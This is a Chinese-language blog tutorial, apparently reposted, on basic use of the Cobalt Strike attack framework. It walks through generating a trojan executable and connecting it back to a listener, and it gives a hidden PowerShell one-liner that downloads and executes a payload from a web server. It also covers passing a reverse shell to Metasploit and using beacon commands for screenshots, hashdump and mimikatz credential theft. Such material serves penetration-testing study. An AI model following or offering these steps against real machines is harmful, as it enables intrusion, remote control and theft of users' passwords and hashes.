Cobalt Strike 简单使用

1、运行服务端

其中afanti就是密码
Cobalt Strike 简单使用_第1张图片

2、客户端

用户名随意写,密码添afanti
Cobalt Strike 简单使用_第2张图片

3、创建listener

Cobalt Strike 简单使用_第3张图片

4、生成木马客户端

Attacks->Packages->Windows Executable

选择刚刚生成的listener,生成木马到桌面。
Cobalt Strike 简单使用_第4张图片
双击artifact.exe木马,客户就能上线。

另一种上线方式

Attacks->Packages->Payload Generator

选择一种语言生成payload
Cobalt Strike 简单使用_第5张图片

Attacks->web Drive-by->Scripted Web Delivery

这个模块相当于搭建一个web服务器,将payload放到服务器上让客户端下载执行。
Cobalt Strike 简单使用_第6张图片

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.61.128:80/aaa'))"

通过msf接收shell

在Cobalt Strik中执行,先添加一个监听命令,名称为:msf payload选择:windows/foreign/reverse_tcp 监听端口:4444
Alt text

Cobalt Strike 简单使用_第7张图片
选择刚刚建立的msf_litener
Cobalt Strike 简单使用_第8张图片
msf配置好在交互界面点击spawn就会把shell弹到msf上,shell弹回来
Cobalt Strike 简单使用_第9张图片

beacon模块使用

截屏

运行截图命令
Cobalt Strike 简单使用_第10张图片
在view->screenshot查看
Cobalt Strike 简单使用_第11张图片

抓hash

beacon> sleep 0  //快速显示结果

beacon> wdigest //读取信息

beacon>hashdump   //读取账号hash密码值,需要administer权限,右击受害者主机--access-hashdump

beacon> logonpasswords  //运行mimikatz, 右击受害者主机--access- RUN mimikatz

其他功能参考下面链接。
参考链接:
https://xz.aliyun.com/t/199#toc-2
https://www.freebuf.com/sectool/133369.html
http://baijiahao.baidu.com/s?id=1599321801235492548&wfr=spider&for=pc
下载参考这个链接

转载于:https://www.cnblogs.com/afanti/p/10321562.html

你可能感兴趣的:(Cobalt Strike 简单使用)